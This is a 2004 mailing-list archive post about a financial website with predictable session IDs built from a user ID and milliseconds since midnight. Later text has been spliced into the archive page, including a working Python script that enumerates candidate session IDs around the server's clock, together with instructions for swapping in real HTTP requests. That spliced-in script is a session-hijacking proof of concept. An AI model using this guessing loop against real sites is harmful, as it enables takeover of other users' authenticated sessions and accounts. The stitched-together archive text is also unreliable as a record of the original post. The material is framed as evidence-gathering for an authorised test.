Web site testing

From: Jerry Shenk (jshenk@decommunications.com)
Date: Thu Apr 22 2004 - 16:09:08 EDT


I've got a web site that I'm pretty sure has some holes, and I've
reported the problems I've seen, but the developer doesn't seem to be
getting things fixed. It seems that they need a little more evidence to
prove that there's a problem, and I'm supposed to find that.

It's a financial web site that uses session IDs that are a mix of the
user ID and the seconds since midnight to the thousandth of a second
(i.e., very predictable). The server (IIS 5) will also readily give up the
current time. A predictable session ID is a bad thing, but I'm not sure
quite how to prove that.

The server is also installed on the C: drive. If I mess up some of the
form data correctly and submit the page, it will respond with a
directory where the file doesn't exist. This new SSL vulnerability will
probably give a chance to prove that installing a web server on the C:
drive is a bad idea, because something will eventually come up.

What are some good web server auditing tools?
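One way to give the developer the "more evidence" the post asks for is a small prediction script: the message only says the ID is a mix of the user ID and milliseconds since midnight, so the exact layout below (user ID, a dash, an eight-digit millisecond count) is an assumed, hypothetical format, and the login time, user name and one-second clock skew are constructed test data. This is an added example, not code from the original post or from the site being discussed. It models a server that hands out such IDs, an attacker who reads the server's clock (e.g. from the HTTP Date header, which only has one-second resolution) and then walks a few thousand candidates around that time, and it contrasts the guessable ID with a random one from the standard library.

```python
import secrets
from datetime import datetime, timedelta
from typing import Callable, Iterator, Optional, Tuple


def ms_since_midnight(t: datetime) -> int:
    """Milliseconds elapsed since local midnight of the given timestamp."""
    midnight = t.replace(hour=0, minute=0, second=0, microsecond=0)
    return int((t - midnight).total_seconds() * 1000)


def weak_session_id(user_id: str, issued_at: datetime) -> str:
    """Assumed (hypothetical) weak scheme: user ID + ms since midnight.

    The post only says the real site mixes these two values; the exact
    concatenation used here is an assumption for illustration.
    """
    return f"{user_id}-{ms_since_midnight(issued_at):08d}"


def strong_session_id() -> str:
    """What a session ID should look like: 256 bits from a CSPRNG."""
    return secrets.token_urlsafe(32)


def candidate_ids(user_id: str, server_now: datetime,
                  window_before_ms: int, window_after_ms: int) -> Iterator[str]:
    """Enumerate every weak ID the server could have issued to user_id
    within [server_now - before, server_now + after]."""
    base = ms_since_midnight(server_now)
    for delta in range(-window_before_ms, window_after_ms + 1):
        ms = (base + delta) % 86_400_000  # wrap across midnight
        yield f"{user_id}-{ms:08d}"


def guess_session(user_id: str, server_now: datetime,
                  is_valid: Callable[[str], bool],
                  window_before_ms: int = 2000,
                  window_after_ms: int = 2000) -> Tuple[Optional[str], int]:
    """Try candidates in order; return (hit, attempts) or (None, attempts).

    is_valid stands in for the real oracle: sending the candidate cookie
    to an authenticated page and checking whether the server accepts it.
    """
    attempts = 0
    for cand in candidate_ids(user_id, server_now, window_before_ms, window_after_ms):
        attempts += 1
        if is_valid(cand):
            return cand, attempts
    return None, attempts


def search_space(window_before_ms: int = 2000, window_after_ms: int = 2000) -> int:
    """Number of guesses needed to cover the window, for comparison with 2**256."""
    return window_before_ms + window_after_ms + 1


def demo() -> Tuple[Optional[str], int]:
    """Constructed scenario: victim logs in, attacker reads the server clock
    one second later (Date header has 1 s granularity) and starts guessing."""
    login_time = datetime(2004, 4, 22, 16, 9, 8, 123000)          # constructed
    issued = {weak_session_id("jshenk", login_time)}              # server-side table
    # Attacker sees the Date header: whole seconds only, 1 s after login.
    observed_server_time = login_time.replace(microsecond=0) + timedelta(seconds=1)
    return guess_session("jshenk", observed_server_time, lambda c: c in issued)


if __name__ == "__main__":
    hit, attempts = demo()
    print(f"recovered {hit} after {attempts} guesses "
          f"(window of {search_space()} candidates vs. 2**256 for a random ID)")
    print("strong ID for comparison:", strong_session_id())
```

In the constructed run the attacker recovers the live session in a little over a thousand requests, which is a few seconds of HTTP traffic; widening the window to cover a whole minute of clock skew still needs only 120,001 guesses. Run against the real site, the same loop with `is_valid` replaced by an HTTP request is the proof the developer is asking for, provided you have written authorisation to test the application.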




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:52 EDT